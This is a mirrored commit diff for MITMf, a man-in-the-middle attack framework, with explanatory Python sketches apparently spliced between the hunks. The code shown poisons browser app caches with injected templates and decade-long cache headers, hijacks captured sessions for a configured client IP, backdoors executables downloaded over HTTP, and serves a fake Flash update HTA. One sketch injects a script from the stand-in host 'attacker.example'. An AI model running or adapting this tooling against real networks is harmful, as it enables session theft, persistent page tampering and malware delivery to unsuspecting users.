mirror of https://github.com/byt3bl33d3r/MITMf.git (synced 2025-07-06 21:12:16 -07:00)

Commit f0fce41c88 (parent 52a493995a): App-Cache poison and BrowserSniper plugins have been refactored, added supported python version tags in README

16 changed files with 96 additions and 121 deletions
@@ -10,6 +10,7 @@
 - @golind
 - @mmetince
 - @niallmerrigan
+- @auraltension

 #Unintentional contributors and/or projects that I stole code from

README.md (36 changes)
@@ -1,3 +1,5 @@
+[]
+
 #MITMf V0.9.8 - 'The Dark Side'

 Framework for Man-In-The-Middle attacks
@@ -15,23 +17,23 @@ Contact me at:

 Available plugins
 =================
-- ```HTA Drive-By``` - Injects a fake update notification and prompts clients to download an HTA application
+- ```HTA Drive-By``` : Injects a fake update notification and prompts clients to download an HTA application
-- ```SMBtrap``` - Exploits the 'SMB Trap' vulnerability on connected clients
+- ```SMBtrap``` : Exploits the 'SMB Trap' vulnerability on connected clients
-- ```Screenshotter``` - Uses HTML5 Canvas to render an accurate screenshot of a clients browser
+- ```Screenshotter``` : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
-- ```Responder``` - LLMNR, NBT-NS, WPAD and MDNS poisoner
+- ```Responder``` : LLMNR, NBT-NS, WPAD and MDNS poisoner
-- ```SSLstrip+``` - Partially bypass HSTS
+- ```SSLstrip+``` : Partially bypass HSTS
-- ```Spoof``` - Redirect traffic using ARP spoofing, ICMP redirects or DHCP spoofing
+- ```Spoof``` : Redirect traffic using ARP spoofing, ICMP redirects or DHCP spoofing
-- ```BeEFAutorun``` - Autoruns BeEF modules based on a client's OS or browser type
+- ```BeEFAutorun``` : Autoruns BeEF modules based on a client's OS or browser type
-- ```AppCachePoison``` - Perform app cache poisoning attacks
+- ```AppCachePoison``` : Perform app cache poisoning attacks
-- ```Ferret-NG``` - Transperently hijacks sessions
+- ```Ferret-NG``` : Transperently hijacks sessions
-- ```BrowserProfiler``` - Attempts to enumerate all browser plugins of connected clients
+- ```BrowserProfiler``` : Attempts to enumerate all browser plugins of connected clients
-- ```FilePwn``` - Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
+- ```FilePwn``` : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
-- ```Inject``` - Inject arbitrary content into HTML content
+- ```Inject``` : Inject arbitrary content into HTML content
-- ```BrowserSniper``` - Performs drive-by attacks on clients with out-of-date browser plugins
+- ```BrowserSniper``` : Performs drive-by attacks on clients with out-of-date browser plugins
-- ```jskeylogger``` - Injects a Javascript keylogger into a client's webpages
+- ```jskeylogger``` : Injects a Javascript keylogger into a client's webpages
-- ```Replace``` - Replace arbitary content in HTML content
+- ```Replace``` : Replace arbitary content in HTML content
-- ```SMBAuth``` - Evoke SMB challenge-response authentication attempts
+- ```SMBAuth``` : Evoke SMB challenge-response authentication attempts
-- ```Upsidedownternet``` - Flips images 180 degrees
+- ```Upsidedownternet``` : Flips images 180 degrees

 How to install on Kali
 ======================

@@ -34,5 +34,5 @@
 </div>
 <div style="padding: 1em;border:1px solid red;margin:1em">
 <h1>AppCache Poison works!</h1>
-<p><code>%%tamper_url%%</code> page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
+<p>This page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
 </div>
@@ -1,2 +1,2 @@

-;console.log('AppCache Poison was here. Google Analytics FTW');
+;alert('AppCache Poison was here. Google Analytics FTW');
@@ -142,7 +142,7 @@
 # Here you can specify the client to hijack sessions from
 #

-Client = '192.168.20.126'
+Client = '192.168.1.26'

 [SSLstrip+]

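The `Client` value in the `[Ferret-NG]` section names the one host whose captured sessions the proxy will replay; the plugin hunk further down reads it verbatim via `self.config['Ferret-NG']['Client']`. A minimal sketch of that wiring, assuming the file is parsed with configobj (the nested `[[sections]]` elsewhere in this config suggest it) and using a hypothetical `should_hijack` helper that is not part of MITMf:

```python
from configobj import ConfigObj

config = ConfigObj("config/mitmf.conf")           # path assumed from the repo layout
hijack_client = config['Ferret-NG']['Client']     # e.g. '192.168.1.26'

def should_hijack(request_ip):
    """Hypothetical helper: only replay sessions captured from the configured client."""
    return request_ip == hijack_client
```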
@@ -248,18 +248,9 @@
 templates=test # which templates to use for spoofing content?
 skip_in_mass_poison=1

-[[gmail]]
-#use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
-
-tamper_url=http://mail.google.com/mail/
-
-# manifest has to be of last domain in redirect loop
-
-manifest_url=http://mail.google.com/robots.txt
-templates=default # could be omitted
-
 [[google]]
-tamper_url = http://www.google.com/
+tamper_url_match = http://www.google.com\.*.
+tamper_url = http://www.google.com
 manifest_url = http://www.google.com/robots.txt

 [[facebook]]
@@ -269,7 +260,7 @@

 [[twitter]]
 tamper_url=http://twitter.com/
-#tamper_url_match=^http://(www\.)?twitter\.com/$
+tamper_url_match=^http://(www\.)?twitter\.com/$
 manifest_url=http://twitter.com/robots.txt

 [[html5rocks]]

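Each `[[section]]` in the AppCachePoison config targets URLs through up to four keys: an exact `tamper_url`, a `tamper_url_match` regex, a `manifest_url`, and optionally a `raw_url`. The refactored plugin (see the AppCachePlugin hunks below) simply tests every request URL against every section. A small sketch of that matching rule over plain dicts; `section_matches` is an illustrative name, not the plugin's API:

```python
import re

def section_matches(section, url):
    """Return which kind of poisoning a config section requests for this URL, if any."""
    if section.get('manifest_url') == url:
        return 'manifest'
    if section.get('raw_url') == url:
        return 'raw'
    if section.get('tamper_url') == url:
        return 'tamper'
    if 'tamper_url_match' in section and re.search(section['tamper_url_match'], url):
        return 'tamper'
    return None

# Using the [[twitter]] section shown above:
twitter = {
    'tamper_url': 'http://twitter.com/',
    'tamper_url_match': r'^http://(www\.)?twitter\.com/$',
    'manifest_url': 'http://twitter.com/robots.txt',
}
print(section_matches(twitter, 'http://www.twitter.com/'))       # tamper
print(section_matches(twitter, 'http://twitter.com/robots.txt')) # manifest
```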
@@ -32,6 +32,7 @@ from twisted.internet import defer
 from twisted.internet import reactor
 from twisted.internet.protocol import ClientFactory

+from core.logger import logger
 from ServerConnectionFactory import ServerConnectionFactory
 from ServerConnection import ServerConnection
 from SSLServerConnection import SSLServerConnection
@@ -39,7 +40,7 @@ from URLMonitor import URLMonitor
 from CookieCleaner import CookieCleaner
 from DnsCache import DnsCache

-formatter = logging.Formatter("%(asctime)s [Ferrent-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
 log = logger().setup_logger("Ferret_ClientRequest", formatter)

 class ClientRequest(Request):
@@ -79,7 +80,6 @@ class ClientRequest(Request):
 headers['cookie'] = entry['cookie']
 except KeyError:
 log.error("No captured sessions (yet) from {}".format(self.urlMonitor.hijack_client))
-pass

 return headers

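The recurring change across these Ferret-NG modules is the import of the shared `core.logger` helper and the fix of the `[Ferrent-NG]` tag in the log format. A standalone sketch of equivalent wiring using only the standard library, with plain `logging` standing in for MITMf's `setup_logger`:

```python
import logging

formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
handler = logging.StreamHandler()
handler.setFormatter(formatter)

log = logging.getLogger("Ferret_ClientRequest")
log.addHandler(handler)
log.setLevel(logging.DEBUG)

log.error("No captured sessions (yet) from {}".format("192.168.1.26"))
# e.g. 2025-07-06 21:12:16 [Ferret-NG] No captured sessions (yet) from 192.168.1.26
```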
@@ -15,8 +15,6 @@
 # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
 # USA
 #
-
-import logging
 import string

 class CookieCleaner:
@@ -18,10 +18,11 @@

 import logging, re, string

+from core.logger import logger
 from ServerConnection import ServerConnection
 from URLMonitor import URLMonitor

-formatter = logging.Formatter("%(asctime)s [Ferrent-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
 log = logger().setup_logger("Ferret_SSLServerConnection", formatter)

 class SSLServerConnection(ServerConnection):
@@ -25,10 +25,11 @@ import gzip
 import StringIO
 import sys

+from core.logger import logger
 from twisted.web.http import HTTPClient
 from URLMonitor import URLMonitor

-formatter = logging.Formatter("%(asctime)s [Ferrent-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
 log = logger().setup_logger("Ferret_ServerConnection", formatter)

 class ServerConnection(HTTPClient):
@@ -20,7 +20,7 @@ import logging
 from core.logger import logger
 from twisted.internet.protocol import ClientFactory

-formatter = logging.Formatter("%(asctime)s [Ferrent-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
 log = logger().setup_logger("Ferret_ServerConnectionFactory", formatter)

 class ServerConnectionFactory(ClientFactory):
mitmf.py (1 change)
@@ -83,6 +83,7 @@ from core.sslstrip.StrippingProxy import StrippingProxy
 from core.sslstrip.URLMonitor import URLMonitor

 URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
+URLMonitor.getInstance().setCaching(options.preserve_cache)
 CookieCleaner.getInstance().setEnabled(options.killsessions)

 strippingFactory = http.HTTPFactory(timeout=10)
@@ -34,22 +34,19 @@ class AppCachePlugin(Plugin):
 def initialize(self, options):
 self.options = options
 self.mass_poisoned_browsers = []

 from core.sslstrip.URLMonitor import URLMonitor
 self.urlMonitor = URLMonitor.getInstance()
 self.urlMonitor.setAppCachePoisoning()

 def response(self, response, request, data):

-#This code was literally copied + pasted from Koto's sslstrip fork, def need to clean this up in the near future
+self.app_config = self.config['AppCachePoison']

-self.app_config = self.config['AppCachePoison'] # so we reload the config on each request
 url = request.client.uri
 req_headers = request.client.getAllHeaders()
 headers = request.client.responseHeaders
 ip = request.client.getClientIP()

-#########################################################################

 if "enable_only_in_useragents" in self.app_config:
 regexp = self.app_config["enable_only_in_useragents"]
 if regexp and not re.search(regexp,req_headers["user-agent"]):
@@ -58,53 +55,56 @@ class AppCachePlugin(Plugin):

 urls = self.urlMonitor.getRedirectionSet(url)
 self.clientlog.debug("Got redirection set: {}".format(urls), extra=request.clientInfo)
-(name,s,element,url) = self.getSectionForUrls(urls)

-if s is False:
+section = False
-data = self.tryMassPoison(url, data, headers, req_headers, ip)
+for url in urls:
-return {'response': response, 'request': request, 'data': data}
+for name in self.app_config:
+if isinstance(self.app_config[name], dict): #'tis a section
+section = self.app_config[name]

-self.clientlog.info("Found URL {} in section {}".format(url, name), extra=request.clientInfo)
+if section.get('manifest_url', False) == url:
-p = self.getTemplatePrefix(s)
+self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)

-if element == 'tamper':
-self.clientlog.info("Poisoning tamper URL with template {}".format(p), extra=request.clientInfo)
-if os.path.exists(p + '.replace'): # replace whole content
-f = open(p + '.replace','r')
-data = self.decorate(f.read(), s)
-f.close()

-elif os.path.exists(p + '.append'): # append file to body
-f = open(p + '.append','r')
-appendix = self.decorate(f.read(), s)
-f.close()
-# append to body
-data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)

-# add manifest reference
-data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)

-elif element == "manifest":
 self.clientlog.info("Poisoning manifest URL", extra=request.clientInfo)
-data = self.getSpoofedManifest(url, s)
+data = self.getSpoofedManifest(url, section)
 headers.setRawHeaders("Content-Type", ["text/cache-manifest"])

-elif element == "raw": # raw resource to modify, it does not have to be html
+elif section.get('raw_url',False) == url: # raw resource to modify, it does not have to be html
+self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)
+p = self.getTemplatePrefix(section)
 self.clientlog.info("Poisoning raw URL", extra=request.clientInfo)
 if os.path.exists(p + '.replace'): # replace whole content
 f = open(p + '.replace', 'r')
-data = self.decorate(f.read(), s)
+data = f.read()
 f.close()

 elif os.path.exists(p + '.append'): # append file to body
 f = open(p + '.append', 'r')
-appendix = self.decorate(f.read(), s)
+data += f.read()
 f.close()
-# append to response body
-data += appendix
+elif (section.get('tamper_url',False) == url) or (section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url)):
+self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)
+p = self.getTemplatePrefix(section)
+self.clientlog.info("Poisoning URL with tamper template: {}".format(p), extra=request.clientInfo)
+if os.path.exists(p + '.replace'): # replace whole content
+f = open(p + '.replace', 'r')
+data = f.read()
+f.close()

+elif os.path.exists(p + '.append'): # append file to body
+f = open(p + '.append', 'r')
+appendix = f.read()
+data = re.sub(re.compile("</body>",re.IGNORECASE), appendix + "</body>", data) #append to body
+f.close()

+# add manifest reference
+data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(section)+"\"", data)

+if section is False:
+data = self.tryMassPoison(url, data, headers, req_headers, ip)

 self.cacheForFuture(headers)
-self.removeDangerousHeaders(headers)
+headers.removeHeader("X-Frame-Options")
 return {'response': response, 'request': request, 'data': data}

 def tryMassPoison(self, url, data, headers, req_headers, ip):
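The heart of the tamper branch is the pair of `re.sub` calls shown in the added lines: one appends the template to the page body, the other adds a `manifest` attribute to the `<html>` tag so the browser stores the poisoned copy in its application cache. A runnable toy example; the page, the appendix and the manifest URL are made-up stand-ins:

```python
import re

data = "<html><head></head><body><h1>Original page</h1></body></html>"
appendix = "<script src='http://attacker.example/poison.js'></script>"   # assumed template content
manifest_url = "http://www.google.com/robots.txt"

# Append the template right before </body> (same call as the '+' line above).
data = re.sub(re.compile("</body>", re.IGNORECASE), appendix + "</body>", data)

# Add the manifest reference so the poisoned copy lands in the AppCache.
data = re.sub(re.compile("<html", re.IGNORECASE), "<html manifest=\"" + manifest_url + "\"", data)

print(data)
# <html manifest="http://www.google.com/robots.txt"><head></head><body><h1>Original page</h1><script src='http://attacker.example/poison.js'></script></body></html>
```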
@@ -112,14 +112,19 @@ class AppCachePlugin(Plugin):

 if not 'mass_poison_url_match' in self.app_config: # no url
 return data

 if browser_id in self.mass_poisoned_browsers: #already poisoned
 return data

 if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
 return data

 if 'mass_poison_useragent_match' in self.app_config and not "user-agent" in req_headers:
 return data

 if not re.search(self.app_config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
 return data

 if not re.search(self.app_config['mass_poison_url_match'], url): #different url
 return data

@@ -140,14 +145,11 @@ class AppCachePlugin(Plugin):

 def cacheForFuture(self, headers):
 ten_years = 315569260
-headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
+headers.setRawHeaders("Cache-Control",["max-age={}".format(ten_years)])
 headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
 in_ten_years = date.fromtimestamp(time.time() + ten_years)
 headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])

-def removeDangerousHeaders(self, headers):
-headers.removeHeader("X-Frame-Options")

 def getSpoofedManifest(self, url, section):
 p = self.getTemplatePrefix(section)
 if not os.path.exists(p+'.manifest'):
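`cacheForFuture` is what makes the poisoning persist: it stamps the response with a ten-year `Cache-Control`, an ancient `Last-Modified` and a far-future `Expires`. A standalone sketch of those header values using only the standard library, with the Twisted `headers` object replaced by plain strings:

```python
import time
from datetime import date

ten_years = 315569260   # same constant as the plugin, roughly ten years in seconds

cache_control = "max-age={}".format(ten_years)
last_modified = "Mon, 29 Jun 1998 02:28:12 GMT"   # "modified long ago, so is most likely fresh"
in_ten_years = date.fromtimestamp(time.time() + ten_years)
expires = in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")

print(cache_control)   # max-age=315569260
print(expires)         # note: date (not datetime) means the time part always renders as 00:00:00
```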
@@ -159,8 +161,8 @@ class AppCachePlugin(Plugin):
 return self.decorate(manifest, section)

 def decorate(self, content, section):
-for i in section:
+for entry in section:
-content = content.replace("%%"+i+"%%", section[i])
+content = content.replace("%%{}%%".format(entry), section[entry])
 return content

 def getTemplatePrefix(self, section):
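`decorate` is the plugin's small templating step: every `%%key%%` token in a template is replaced with the matching value from the config section, which is why the old default template earlier in this diff contained `%%tamper_url%%`. A self-contained example with a made-up section dict:

```python
def decorate(content, section):
    """Replace every %%key%% placeholder with the section's value, as the plugin does."""
    for entry in section:
        content = content.replace("%%{}%%".format(entry), section[entry])
    return content

section = {"tamper_url": "http://www.google.com", "manifest_url": "http://www.google.com/robots.txt"}
html = "<p><code>%%tamper_url%%</code> page is spoofed.</p>"
print(decorate(html, section))   # <p><code>http://www.google.com</code> page is spoofed.</p>
```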
@@ -174,24 +176,3 @@ class AppCachePlugin(Plugin):

 def getManifestUrl(self, section):
 return section.get("manifest_url",'/robots.txt')
-
-def getSectionForUrls(self, urls):
-for url in urls:
-for i in self.app_config:
-if isinstance(self.app_config[i], dict): #section
-section = self.app_config[i]
-name = i
-
-if section.get('tamper_url',False) == url:
-return (name, section, 'tamper',url)
-
-if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
-return (name, section, 'tamper',url)
-
-if section.get('manifest_url',False) == url:
-return (name, section, 'manifest',url)
-
-if section.get('raw_url',False) == url:
-return (name, section, 'raw',url)
-
-return (None, False,'',urls.copy().pop())

@@ -23,7 +23,7 @@ from datetime import datetime
 from plugins.plugin import Plugin
 from twisted.internet import reactor
 from twisted.web import http
-from twisted.internet import reactor
+from core.ferretng.URLMonitor import URLMonitor

 class FerretNG(Plugin):
 name = "Ferret-NG"
@@ -37,9 +37,6 @@ class FerretNG(Plugin):
 self.ferret_port = options.ferret_port
 self.cookie_file = None

-from core.ferretng.FerretProxy import FerretProxy
-from core.ferretng.URLMonitor import URLMonitor
-
 URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client']

 from core.utils import shutdown
@@ -79,6 +76,7 @@ class FerretNG(Plugin):
 URLMonitor.getInstance().cookies[client].append({'host': host, 'cookie': cookie})

 def reactor(self, StrippingProxy):
+from core.ferretng.FerretProxy import FerretProxy
 FerretFactory = http.HTTPFactory(timeout=10)
 FerretFactory.protocol = FerretProxy
 reactor.listenTCP(self.ferret_port, FerretFactory)

@@ -388,7 +388,7 @@ class FilePwn(Plugin):
 continue

 # Check against keywords
-keywordCheck = False
+keywordCheck = True

 if type(self.tarblacklist) is str:
 if self.tarblacklist.lower() in info.name.lower():
@@ -502,7 +502,7 @@
 continue

 #Check against keywords
-keywordCheck = False
+keywordCheck = True

 if type(self.zipblacklist) is str:
 if self.zipblacklist.lower() in info.filename.lower():
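Both keyword hunks only flip the initial value of `keywordCheck`; the surrounding blacklist test visible in the context lines accepts either a single string or a list, hence the `type(...) is str` branch. A hedged sketch of that check as a standalone helper; the helper name and the example blacklist are illustrative, not MITMf's:

```python
def name_is_blacklisted(name, blacklist):
    """True if any blacklist keyword appears in the archive member's name."""
    if isinstance(blacklist, str):
        return blacklist.lower() in name.lower()
    return any(keyword.lower() in name.lower() for keyword in blacklist)

print(name_is_blacklisted("tools/setup.exe", ["driver", "setup"]))   # True
print(name_is_blacklisted("readme.txt", "setup"))                    # False
```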
@@ -591,7 +591,8 @@ class FilePwn(Plugin):
 def response(self, response, request, data):

 content_header = response.headers['Content-Type']
-client_ip = response.getClientIP()
+content_length = int(response.headers['Content-Length'])
+client_ip = request.client.getClientIP()

 for target in self.userConfig['targets'].keys():
 if target == 'ALL':
@@ -630,7 +631,7 @@
 self.clientlog.info("Patching complete, forwarding to client!", extra=request.clientInfo)
 return {'response': response, 'request': request, 'data': bd_tar}

-elif content_header in self.binaryMimeTypes:
+elif (content_header in self.binaryMimeTypes) and (content_length <= self.FileSizeMax):
 for bintype in ['pe','elf','fatfile','machox64','machox86']:
 if self.bytes_have_format(data, bintype):
 self.clientlog.info("Detected supported binary type ({})!".format(bintype), extra=request.clientInfo)

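The second FilePwn hunk adds a size gate: a binary is only handed to the Backdoor Factory when its declared `Content-Length` is at or below `FileSizeMax`, so oversized downloads are forwarded untouched. A minimal sketch of that decision; the MIME list and the cap are illustrative assumptions, not MITMf's configured defaults:

```python
binary_mime_types = ["application/octet-stream", "application/x-msdownload"]   # illustrative
file_size_max = 60000000                                                       # illustrative cap, in bytes

def should_patch(content_type, content_length):
    """Mirror of the new elif condition: right MIME type and small enough to patch."""
    return (content_type in binary_mime_types) and (content_length <= file_size_max)

print(should_patch("application/x-msdownload", 350000))      # True  -> send through the Backdoor Factory
print(should_patch("application/x-msdownload", 900000000))   # False -> forward the original bytes
```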
@@ -53,4 +53,4 @@ class HTADriveBy(Inject, Plugin):

 def options(self, options):
 options.add_argument('--text', type=str, default='The Adobe Flash Player plug-in was blocked because it is out of date.', help="Text to display on notification bar")
-options.add_argument('--hta-app', type=str, default='./config/hta_driveby/Flash.hta', help='Path to HTA application [defaults to config/hta_driveby/Flash.hta]')
+options.add_argument('--hta-app', type=str, default='./config/hta_driveby/flash_setup.hta', help='Path to HTA application [defaults to config/hta_driveby/flash_setup.hta]')